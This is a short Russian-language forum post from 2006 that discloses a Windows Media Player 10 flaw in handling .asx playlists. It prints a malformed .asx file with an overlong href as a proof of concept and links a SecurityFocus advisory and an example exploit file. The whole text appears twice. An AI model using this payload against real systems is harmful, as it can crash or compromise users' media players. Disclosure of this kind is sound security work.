-=lebed=-
24.11.2006, 16:59
22 Ноября 2006 Обнародована уязвимость в обработке плейлистов asx виндоузмедиаплеером.
Протестировано :
Windows Media 10.00.00.4036 - версия проигрывателя
Windows XP SP2 - версия системы
содержимое файла *.asx:
<asx><entry>
<ref
href="aa:
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaa.mp3"/>
</entry></asx>
Источник: (http://www.securityfocus.com/archive/1/452352/30/0/threaded)
Пример эксплоита (без контоля компонентов по ссылке не ходить Х.е.З чем заряжен) (http://www.security.nnov.ru/files/example.asx)
P.S. Пробелы исключить естественно
Протестировано :
Windows Media 10.00.00.4036 - версия проигрывателя
Windows XP SP2 - версия системы
содержимое файла *.asx:
<asx><entry>
<ref
href="aa:
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaa.mp3"/>
</entry></asx>
Источник: (http://www.securityfocus.com/archive/1/452352/30/0/threaded)
Пример эксплоита (без контоля компонентов по ссылке не ходить Х.е.З чем заряжен) (http://www.security.nnov.ru/files/example.asx)
P.S. Пробелы исключить естественно